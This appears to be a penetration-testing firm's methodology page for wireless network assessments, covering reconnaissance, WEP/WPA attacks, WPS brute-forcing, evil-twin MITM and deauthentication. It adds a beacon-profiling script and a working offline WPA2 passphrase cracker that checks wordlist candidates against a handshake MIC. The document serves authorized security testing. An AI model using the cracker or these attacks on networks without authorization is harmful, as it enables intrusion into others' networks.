Wireless Infrastructure Testing

Weak implementations of encryption, authentication and security policy in your wireless infrastructure could allow malicious entities to access your corporate network and confidential data.

The Wireless Infrastructure Testing Methodology is divided into three distinct phases: Profiling, Assessment and Exploitation.

Profiling Phase

Information Gathering (Reconnaissance) techniques will be performed to gather as much information as possible about the customer's wireless infrastructure.

Specifically, the following techniques will be used to find and assess security-relevant information:

Information Gathering (Reconnaissance)

Network Name (SSID) – Identifying all in-scope SSIDs, including hidden (non-broadcast) ones

MAC Locking – Identifying whether the Access Point restricts association to an allow-list of client MAC addresses (MAC filtering)

MAC of AP (BSSID) – Identifying the MAC addresses (BSSIDs) of all related Access Points

Security Protocols – Identifying the security protocol in use (such as WEP, WPA or WPA2) and whether WPS is enabled

Channel of AP – Identifying the channel and band the Access Point operates on (channels 1-13 or 1-14 in the 2.4 GHz band, depending on the regulatory domain, or the 5 GHz channels)

Authentication Methods – Identifying the authentication method in use (Pre-Shared Key / Personal, or Enterprise / 802.1X with a RADIUS server)

MAC of Clients – Identifying connected clients and their MAC addresses (these become spoofing targets where MAC filtering is in place)

Integrity Checks – Identifying the cipher and integrity suites in use (TKIP, or AES-based CCMP); TKIP is a legacy suite and is flagged when found

Signal Strength – Identifying the Access Point's signal strength, which determines how far outside the premises an attacker can reach it

Authentication Options – Identifying the EAP methods in use on Enterprise networks (such as LEAP, EAP-TLS, EAP-TTLS, EAP-SIM)

Rogue AP – Identifying possible rogue Access Points (devices advertising the customer's SSIDs that are not part of the managed infrastructure)

Encapsulation Protocols – Identifying the encapsulation and tunnelled EAP protocols in use (such as IEEE 802.1X, PEAP carrying EAP-MSCHAPv2 or EAP-GTC, PANA)
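
As an added illustration (Python written for this page, not code from the original page or from any tool it mentions), the following decoder pulls the profiling items listed above out of a captured 802.11 beacon frame body: SSID, channel, security protocol, cipher suites and authentication (AKM) method, and notes the weaknesses the Assessment Phase will follow up. Element IDs and suite selectors are those defined in IEEE 802.11; the beacon bodies at the bottom are constructed for the example and are not real captures.

```python
"""Profile an access point from a captured 802.11 beacon frame body (constructed example)."""
import struct

# Suite selectors from the RSN element (WPA2/WPA3), OUI 00-0F-AC
RSN_OUI = b"\x00\x0f\xac"
RSN_CIPHERS = {1: "WEP-40", 2: "TKIP", 4: "CCMP-128", 5: "WEP-104",
               8: "GCMP-128", 9: "GCMP-256", 10: "CCMP-256"}
RSN_AKMS = {1: "802.1X", 2: "PSK", 3: "FT-802.1X", 4: "FT-PSK", 5: "802.1X-SHA256",
            6: "PSK-SHA256", 8: "SAE", 9: "FT-SAE", 18: "OWE"}
# Legacy WPA uses a vendor-specific element (ID 221), Microsoft OUI 00-50-F2, type 1
WPA_OUI = b"\x00\x50\xf2"
WPA_CIPHERS = {1: "WEP-40", 2: "TKIP", 4: "CCMP-128", 5: "WEP-104"}
WPA_AKMS = {1: "802.1X", 2: "PSK"}


def iter_ies(blob):
    """Yield (element_id, payload) for each tagged parameter; stop on a truncated element."""
    off = 0
    while off + 2 <= len(blob):
        eid, length = blob[off], blob[off + 1]
        payload = blob[off + 2:off + 2 + length]
        if len(payload) < length:
            break
        yield eid, payload
        off += 2 + length


def _suite(raw, oui, names):
    """Map a 4-byte suite selector (OUI + type) to a name."""
    if len(raw) < 4:
        return "truncated"
    if raw[:3] != oui:
        return "vendor-%s-%d" % (raw[:3].hex(), raw[3])
    return names.get(raw[3], "unknown-%d" % raw[3])


def parse_suites(data, oui, ciphers, akms):
    """Decode version, group cipher, pairwise ciphers and AKM suites from an RSN/WPA body."""
    if len(data) < 8:          # version + group suite + pairwise count is the minimum
        return None
    version = struct.unpack_from("<H", data, 0)[0]
    group = _suite(data[2:6], oui, ciphers)
    n_pair = struct.unpack_from("<H", data, 6)[0]
    off = 8
    pairwise = [_suite(data[off + 4 * i:off + 4 * i + 4], oui, ciphers) for i in range(n_pair)]
    off += 4 * n_pair
    akm = []
    if off + 2 <= len(data):
        n_akm = struct.unpack_from("<H", data, off)[0]
        off += 2
        akm = [_suite(data[off + 4 * i:off + 4 * i + 4], oui, akms) for i in range(n_akm)]
    return {"version": version, "group": group, "pairwise": pairwise, "akm": akm}


def profile_beacon(body):
    """Return the profiling record for one beacon frame body (fixed fields + IEs)."""
    if len(body) < 12:
        raise ValueError("beacon body too short for timestamp/interval/capability")
    _ts, _interval, capability = struct.unpack_from("<QHH", body, 0)
    privacy = bool(capability & 0x0010)   # Privacy bit: WEP, WPA or RSN encryption in use
    rec = {"ssid": None, "channel": None, "security": "Open",
           "group": None, "pairwise": [], "akm": [], "findings": []}
    rsn = wpa = None
    for eid, payload in iter_ies(body[12:]):
        if eid == 0:                       # SSID; hidden networks send empty or null-filled
            name = payload.strip(b"\x00")
            rec["ssid"] = name.decode("utf-8", "replace") if name else "<hidden>"
        elif eid == 3 and len(payload) == 1:   # DS Parameter Set: channel number
            rec["channel"] = payload[0]
        elif eid == 48:
            rsn = parse_suites(payload, RSN_OUI, RSN_CIPHERS, RSN_AKMS)
        elif eid == 221 and payload[:4] == WPA_OUI + b"\x01":
            wpa = parse_suites(payload[4:], WPA_OUI, WPA_CIPHERS, WPA_AKMS)
    if rsn:
        wpa3 = any(a in ("SAE", "FT-SAE", "OWE") for a in rsn["akm"])
        wpa2 = any(a not in ("SAE", "FT-SAE", "OWE") for a in rsn["akm"])
        rec["security"] = "WPA2/WPA3" if wpa3 and wpa2 else ("WPA3" if wpa3 else "WPA2")
    elif wpa:
        rec["security"] = "WPA"
    elif privacy:
        rec["security"] = "WEP"             # Privacy bit without RSN/WPA element means WEP
    info = rsn or wpa
    if info:
        rec["group"], rec["pairwise"], rec["akm"] = info["group"], info["pairwise"], info["akm"]
    # Findings feed the assessment phase
    if rec["security"] in ("Open", "WEP"):
        rec["findings"].append("no or legacy encryption (%s)" % rec["security"])
    if "TKIP" in rec["pairwise"] or rec["group"] == "TKIP":
        rec["findings"].append("TKIP cipher enabled")
    if any(a.startswith("PSK") for a in rec["akm"]):
        rec["findings"].append("PSK authentication: handshake can be captured for offline cracking")
    return rec


def _ie(eid, payload):
    return bytes([eid, len(payload)]) + payload


def _rsn(pairwise, akm, group=4):
    body = b"\x01\x00" + RSN_OUI + bytes([group]) + struct.pack("<H", len(pairwise))
    body += b"".join(RSN_OUI + bytes([p]) for p in pairwise)
    body += struct.pack("<H", len(akm)) + b"".join(RSN_OUI + bytes([a]) for a in akm)
    return _ie(48, body + b"\x00\x00")       # trailing RSN capabilities field


def _beacon(capability, ies):
    return struct.pack("<QHH", 0, 100, capability) + ies   # timestamp, interval, capability


# Constructed beacon bodies (not real captures): ESS bit 0x0001, Privacy bit 0x0010
SAMPLE_WPA2 = _beacon(0x0011, _ie(0, b"CorpNet") + _ie(1, b"\x82\x84\x8b\x96") + _ie(3, b"\x06") + _rsn([4], [2]))
SAMPLE_MIXED = _beacon(0x0011, _ie(0, b"CorpNet-Legacy") + _ie(3, b"\x01") + _rsn([2, 4], [2], group=2))
SAMPLE_WEP = _beacon(0x0011, _ie(0, b"Warehouse") + _ie(3, b"\x0b"))
SAMPLE_OPEN = _beacon(0x0001, _ie(0, b"Guest") + _ie(3, b"\x24"))       # channel 36 (5 GHz)
SAMPLE_WPA3 = _beacon(0x0011, _ie(0, b"CorpNet-SAE") + _ie(3, b"\x06") + _rsn([4], [8]))

if __name__ == "__main__":
    for sample in (SAMPLE_WPA2, SAMPLE_MIXED, SAMPLE_WEP, SAMPLE_OPEN, SAMPLE_WPA3):
        print(profile_beacon(sample))
```

In practice the frame bodies come from a monitor-mode capture (a pcap from airodump-ng or similar), and the same decoder applies to probe responses. When the DS Parameter Set element is absent, take the channel from the capture's radiotap header instead. Client MAC addresses and signal strength are not in the beacon body; they come from data frames and the radiotap header respectively.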


Assessment Phase

Both automated and manual vulnerability assessment will be performed, based on the information found in the Profiling Phase, against the customer's wireless infrastructure, so that known vulnerabilities are identified and previously unknown weaknesses in configuration or implementation are sought.

Specifically, the following vulnerability assessment techniques will be used:

Vulnerability Assessment

WEP Attacks – Attempting to recover the WEP key with known WEP attacks (such as ARP Replay, Fragmentation, Caffe-Latte, ChopChop, Hirte etc.). These attacks exploit WEP's RC4 keystream reuse and CRC-32 integrity check and do not apply to WPA/WPA2 networks, whether TKIP or AES-CCMP; those are assessed through the password and Pre-Shared Key items below.

Brute-forcing weak Password Policy – Capturing user names and domain names sent in the clear (for example in EAP identity responses), or guessing them, and brute-forcing common passwords against the authentication point. Brute-forcing the WPS PIN, which is validated in two halves and so can be exhausted in a practical number of attempts, to retrieve the Access Point's configuration including the PSK.

Pre-Shared Key (PSK) – Recovering the WEP key from captured traffic, and capturing the WPA/WPA2 four-way handshake (triggered, if necessary, by deauthenticating a connected client) so that the Pre-Shared Key can be recovered offline; the PSK itself is never transmitted.

Man-In-The-Middle (MITM) – Man-In-The-Middle techniques (such as an evil-twin Access Point advertising the customer's SSID) will be used against the Client and the Access Point.

MAC Spoofing – Where MAC Locking is in place, the MAC address of an observed authorised client will be spoofed to bypass the restriction.

Denial-of-Service (DoS) – Identifying whether Access Point(s) and their clients are vulnerable to Denial-of-Service attacks (such as deauthentication or disassociation flooding).

Exploitation Phase

At the exploitation stage we will attempt to exploit, and thereby validate, the identified vulnerabilities. Both online and offline password cracking techniques (e.g. guessing, dictionary, hybrid, brute-force) will be performed against captured authentication material (e.g. the WPA/WPA2 handshake, against which Pre-Shared Key candidates are verified offline) and/or against authentication points found in previous steps of testing. In case of successful exploitation we will try to escalate privileges within applications, hosts and networks.
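
The Pre-Shared Key item of the Assessment Phase and the offline cracking described in this Exploitation Phase come down to one computation, shown here as an added example (Python written for this page, not the page's own method or any cracking tool's code). The WPA2 passphrase is expanded into the PMK with PBKDF2, the PMK together with both MAC addresses and both handshake nonces into the PTK, and the first 16 bytes of the PTK (the KCK) authenticate EAPOL message 2 of the handshake; a dictionary candidate is accepted only if it reproduces the captured MIC. The MAC addresses, nonces and EAPOL frame below are constructed for the example, and the "captured" MIC is computed from the known passphrase so the example runs offline; the SSID/passphrase pair "IEEE"/"password" is the PBKDF2 test vector published in IEEE 802.11i.

```python
"""Offline recovery of a WPA2 Pre-Shared Key from a four-way handshake (constructed example)."""
import hashlib
import hmac


def derive_pmk(passphrase, ssid):
    """PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 256 bits), per IEEE 802.11i."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key, label, data):
    """IEEE 802.11 PRF-512: concatenated HMAC-SHA1(key, label || 0x00 || data || i), truncated."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK from the PMK, both MAC addresses and both nonces (ordered by value, not by role)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame_mic_zeroed):
    """WPA2 (key descriptor version 2): HMAC-SHA1 over the frame with MIC zeroed, 128-bit output."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def split_mic(eapol_frame):
    """The MIC occupies octets 81..96 of an EAPOL-Key frame; return (frame with MIC zeroed, MIC)."""
    return eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:], eapol_frame[81:97]


def crack_psk(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame):
    """Return the first candidate whose derived KCK reproduces the captured MIC, else None."""
    zeroed, captured = split_mic(eapol_frame)
    for candidate in wordlist:
        kck = derive_ptk(derive_pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured):
            return candidate
    return None


def build_eapol_msg2(snonce, rsn_ie, mic=b"\x00" * 16):
    """EAPOL-Key message 2 of the handshake (802.1X header + RSN key descriptor)."""
    body = (b"\x02"                    # descriptor type 2 = RSN (WPA2)
            + b"\x01\x0a"              # key info: MIC set, pairwise, descriptor version 2 (HMAC-SHA1)
            + b"\x00\x10"              # key length 16 (CCMP)
            + b"\x00" * 7 + b"\x01"    # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, reserved
            + mic + len(rsn_ie).to_bytes(2, "big") + rsn_ie)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # 802.1X v2, type 3 (EAPOL-Key)


# Constructed handshake values, not a real capture; "IEEE"/"password" is the 802.11i PBKDF2 vector.
SSID = "IEEE"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")   # CCMP / CCMP / PSK
_kck = derive_ptk(derive_pmk("password", SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
CAPTURED_MSG2 = build_eapol_msg2(SNONCE, RSN_IE, eapol_mic(_kck, build_eapol_msg2(SNONCE, RSN_IE)))
WORDLIST = ["letmein", "Welcome1", "corpwifi", "password", "Summer2019!"]


def run(wordlist=WORDLIST):
    return crack_psk(wordlist, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, CAPTURED_MSG2)


if __name__ == "__main__":
    print("recovered passphrase:", run())
```

Two caveats a tester should keep in mind: WPA (TKIP, key descriptor version 1) computes the MIC with HMAC-MD5 rather than HMAC-SHA1, and because the PMK is salted with the SSID, precomputed tables only help for one SSID at a time, which is why the Profiling Phase records the exact SSID. The 4096-round PBKDF2 is the whole cost of each guess, so a real run hands the same computation to a GPU-based cracker.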